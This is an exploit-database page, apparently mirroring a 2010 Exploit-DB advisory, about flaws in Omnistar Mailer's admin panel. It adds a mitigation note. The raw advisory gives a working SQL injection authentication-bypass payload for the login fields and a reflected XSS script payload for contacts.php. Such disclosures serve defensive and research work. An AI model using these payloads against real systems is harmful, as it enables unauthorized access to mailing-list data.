header-logo
Suggest Exploit
vendor:
Omnistar Mailer
by:
Sid3^effects
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Omnistar Mailer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Omnistar Mailer SQLi Vulnerability

The Omnistar Mailer software is vulnerable to SQL Injection. An attacker can bypass authentication by using the payload ' or 1=1 or ''=' in both the username and password fields.

Mitigation:

The vendor should release a patch to fix the SQL Injection vulnerability. In the meantime, users can mitigate the risk by implementing strict input validation and using parameterized queries.
Source

Exploit-DB raw data:

1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Omnistar Mailer SQLi Vulnerability
Date : june, 21 2010
Critical Level     : HIGH
Vendor Url : http://www.omnistarmailer.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends luv y0 guyz
#######################################################################################################
Description:
Are you a business and your are looking to increase your profit? Omnistar mailing list software will allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
#######################################################################################################
Xploit:AUTH BYPASS Vulnerability

USE  ' or 1=1 or ''='  in both username and password and you are in

DEMO URL
          http://server/mailerd4/admin/index.php

###############################################################################################################
Xploit:XSS Vulnerability

Attack pattern :"><script>alert("Sid3^effects")</script>
demo url :http://server/mailerd4/admin/contacts.php?op=[xss]

###############################################################################################################
# 0day no more
# Sid3^effects

Navigation

Suggest Exploit

Services By CQR